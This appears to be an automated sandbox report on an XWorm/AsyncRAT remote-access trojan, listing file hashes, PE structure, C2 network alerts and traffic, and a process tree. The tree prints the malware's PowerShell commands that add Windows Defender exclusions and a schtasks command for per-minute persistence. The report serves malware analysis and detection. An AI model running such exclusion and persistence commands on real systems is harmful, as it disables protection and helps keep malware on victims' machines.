                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\localsys64.lnk

                                                  Download File
                                                  Process:C:\Users\user\Desktop\fjijTlM2tu.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Oct 22 16:29:54 2024, mtime=Tue Oct 22 16:29:54 2024, atime=Tue Oct 22 16:29:54 2024, length=302592, window=hide
                                                  Category:dropped
                                                  Size (bytes):781
                                                  Entropy (8bit):5.1049401798418135
                                                  Encrypted:false
                                                  SSDEEP:12:8jC+4Sd0WCkdY//DR/ygELwH0SjAw/rrHhq6GZWMbBrpBmV:8jcSd/3+75ygm4Ay1qWMb/Bm
                                                  MD5:C5257109C8A33A2340CFD426254C1A1A
                                                  SHA1:6CD358FEF136EC37E00BE5F29CFB57BC4F66B46D
                                                  SHA-256:29A8FAF272898FEF52A0AA753F58E68871DCD5B47F179C81DBEA31A1259132D7
                                                  SHA-512:BCD5D9666FDBED0EC1C12540DFA4EC5CB4ED4562EE91546235BD5594C7E78002906AF26E8E752025CA8117D283298555F447FA8C378A6C498C915FB221AC8F3E
                                                  Malicious:false
                                                  Preview:L..................F.... .....J..$....J..$....J..$..........................~.:..DG..Yr?.D..U..k0.&...&......vk.v.....e..$...Y`..$......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^VY.............................%..A.p.p.D.a.t.a...B.V.1.....VY....Roaming.@......CW.^VY............................k...R.o.a.m.i.n.g.....j.2.....VY.. .LOCALS~1.EXE..N......VY..VY...........................U..l.o.c.a.l.s.y.s.6.4...e.x.e.......\...............-.......[.............]......C:\Users\user\AppData\Roaming\localsys64.exe........\.....\.....\.....\.....\.l.o.c.a.l.s.y.s.6.4...e.x.e.`.......X.......618321...........hT..CrF.f4... ...??.....,.......hT..CrF.f4... ...??.....,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                  C:\Users\user\AppData\Roaming\localsys64.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\fjijTlM2tu.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):302592
                                                  Entropy (8bit):5.890341418244703
                                                  Encrypted:false
                                                  SSDEEP:6144:9hcv9vN1C4q1q6NO+MUIccXc4zkXf9etvQbQseRJh8uEZy:9hny
                                                  MD5:55107DA03A7EE49D56320D0B43945691
                                                  SHA1:E8C75F1A39FEC81A99E3C65C45F965B669286D59
                                                  SHA-256:929395B5D0F521C2A6B556A341DA65343177A3EDCC88862938D5A8CEF166E93C
                                                  SHA-512:F7EE06CC2A0434473B8D728B0FDD8414AAA828516344D98DE2606EA5CF14BD6360FABC934360F65D173B772DE36B56ACFED3F1F7D7FD77CE0599DD2329955231
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\localsys64.exe, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\localsys64.exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g................................. ........@.. ....................................@....................................S.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........Z...W............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):5.890341418244703
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  File name:fjijTlM2tu.exe
                                                  File size:302'592 bytes
                                                  MD5:55107da03a7ee49d56320d0b43945691
                                                  SHA1:e8c75f1a39fec81a99e3c65c45f965b669286d59
                                                  SHA256:929395b5d0f521c2a6b556a341da65343177a3edcc88862938d5a8cef166e93c
                                                  SHA512:f7ee06cc2a0434473b8d728b0fdd8414aaa828516344d98de2606ea5cf14bd6360fabc934360f65d173b772de36b56acfed3f1f7d7fd77ce0599dd2329955231
                                                  SSDEEP:6144:9hcv9vN1C4q1q6NO+MUIccXc4zkXf9etvQbQseRJh8uEZy:9hny
                                                  TLSH:D9548052BA04A29AE64B3CB3106EC53808666D7F46E5855DB58DF73A02F334901DEF3E
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g................................. ........@.. ....................................@................................

                                                  File Icon

                                                  Icon Hash:daccccd4e2e1e179

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x40b32e
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x671797AF [Tue Oct 22 12:16:47 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb2d80x53.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x4059c.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x4e0000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000x93340x94005a451112ca9ba388bf2601468fe7c04bFalse0.49187077702702703data5.703458714731767IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc0xc0000x4059c0x406001ccc66d734c969be8559cb804814c203False0.13236498786407766data5.671663807042734IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x4e0000xc0x200c0d5609670725c27b8145a6315faf01aFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0xc1300x40028Device independent bitmap graphic, 248 x 512 x 32, image size 2539520.13036646019589296
                                                  RT_GROUP_ICON0x4c1580x14data1.05
                                                  RT_VERSION0x4c16c0x244data0.4689655172413793
                                                  RT_MANIFEST0x4c3b00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Network Behavior

                                                  Suricata IDS Alerts

                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-10-22T19:31:00.614747+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.450013147.185.221.2243768TCP

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 22, 2024 19:30:01.228127956 CEST4975943768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:01.233719110 CEST4376849759147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:01.233798027 CEST4975943768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:01.415050030 CEST4975943768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:01.420521021 CEST4376849759147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:05.984688997 CEST4376849759147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:05.984792948 CEST4975943768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:08.861319065 CEST4975943768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:08.863071918 CEST4979543768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:08.866844893 CEST4376849759147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:08.868455887 CEST4376849795147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:08.868612051 CEST4979543768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:08.890459061 CEST4979543768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:08.896008015 CEST4376849795147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:13.649228096 CEST4376849795147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:13.649332047 CEST4979543768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:13.706581116 CEST4979543768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:13.708211899 CEST4982043768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:13.711894989 CEST4376849795147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:13.713629007 CEST4376849820147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:13.713723898 CEST4982043768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:13.731997967 CEST4982043768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:13.737394094 CEST4376849820147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:18.509737968 CEST4376849820147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:18.509788990 CEST4982043768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:18.611358881 CEST4982043768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:18.612041950 CEST4984143768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:18.616647959 CEST4376849820147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:18.617403984 CEST4376849841147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:18.617486000 CEST4984143768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:18.631936073 CEST4984143768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:18.637379885 CEST4376849841147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:23.395808935 CEST4376849841147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:23.395870924 CEST4984143768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:26.259103060 CEST4984143768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:26.264389038 CEST4376849841147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:26.266484976 CEST4987543768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:26.272022963 CEST4376849875147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:26.272088051 CEST4987543768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:26.467658043 CEST4987543768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:26.473769903 CEST4376849875147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:31.036139011 CEST4376849875147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:31.036283016 CEST4987543768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:34.080132961 CEST4987543768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:34.081058025 CEST4991443768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:34.085516930 CEST4376849875147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:34.086536884 CEST4376849914147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:34.086616039 CEST4991443768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:34.102144957 CEST4991443768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:34.107619047 CEST4376849914147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:38.882920980 CEST4376849914147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:38.883372068 CEST4991443768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:39.486486912 CEST4991443768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:39.487025023 CEST4994543768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:39.492048025 CEST4376849914147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:39.492592096 CEST4376849945147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:39.492666006 CEST4994543768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:39.505634069 CEST4994543768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:39.511142015 CEST4376849945147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:44.343118906 CEST4376849945147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:44.343178988 CEST4994543768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:44.924057961 CEST4994543768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:44.924899101 CEST4997843768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:44.929398060 CEST4376849945147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:44.930249929 CEST4376849978147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:44.930430889 CEST4997843768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:44.945211887 CEST4997843768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:44.950936079 CEST4376849978147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:49.688060045 CEST4376849978147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:49.688200951 CEST4997843768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:49.830300093 CEST4997843768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:49.831125021 CEST5000343768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:49.835874081 CEST4376849978147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:49.836421013 CEST4376850003147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:49.836519003 CEST5000343768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:49.853002071 CEST5000343768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:49.858407974 CEST4376850003147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:54.620877981 CEST4376850003147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:54.621007919 CEST5000343768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:54.627439022 CEST5000343768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:54.628459930 CEST5001243768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:54.632917881 CEST4376850003147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:54.633785009 CEST4376850012147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:54.633877993 CEST5001243768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:54.651772022 CEST5001243768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:54.657382965 CEST4376850012147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:59.489356995 CEST4376850012147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:59.489516020 CEST5001243768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:59.689543009 CEST5001243768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:59.691128969 CEST5001343768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:59.792728901 CEST4376850012147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:59.792742968 CEST4376850013147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:30:59.792902946 CEST5001343768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:59.808676004 CEST5001343768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:30:59.814191103 CEST4376850013147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:31:00.614747047 CEST5001343768192.168.2.4147.185.221.22
                                                  Oct 22, 2024 19:31:00.620445013 CEST4376850013147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:31:04.547914982 CEST4376850013147.185.221.22192.168.2.4
                                                  Oct 22, 2024 19:31:04.547976017 CEST5001343768192.168.2.4147.185.221.22

                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:13:28:55
                                                  Start date:22/10/2024
                                                  Path:C:\Users\user\Desktop\fjijTlM2tu.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\fjijTlM2tu.exe"
                                                  Imagebase:0x710000
                                                  File size:302'592 bytes
                                                  MD5 hash:55107DA03A7EE49D56320D0B43945691
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1659315673.0000000000712000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1659315673.0000000000712000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2928111797.0000000012C68000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2928111797.0000000012C68000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                  Reputation:low
                                                  Has exited:false

                                                  General

                                                  Target ID:1
                                                  Start time:13:28:59
                                                  Start date:22/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe'
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:2
                                                  Start time:13:28:59
                                                  Start date:22/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:4
                                                  Start time:13:29:06
                                                  Start date:22/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'fjijTlM2tu.exe'
                                                  Imagebase:0x7ff70f330000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:5
                                                  Start time:13:29:06
                                                  Start date:22/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:7
                                                  Start time:13:29:16
                                                  Start date:22/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\localsys64.exe'
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:8
                                                  Start time:13:29:16
                                                  Start date:22/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:11
                                                  Start time:13:29:33
                                                  Start date:22/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'localsys64.exe'
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:12
                                                  Start time:13:29:33
                                                  Start date:22/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:14
                                                  Start time:13:29:54
                                                  Start date:22/10/2024
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "localsys64" /tr "C:\Users\user\AppData\Roaming\localsys64.exe"
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:15
                                                  Start time:13:29:54
                                                  Start date:22/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:16
                                                  Start time:13:29:56
                                                  Start date:22/10/2024
                                                  Path:C:\Users\user\AppData\Roaming\localsys64.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\AppData\Roaming\localsys64.exe
                                                  Imagebase:0x180000
                                                  File size:302'592 bytes
                                                  MD5 hash:55107DA03A7EE49D56320D0B43945691
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
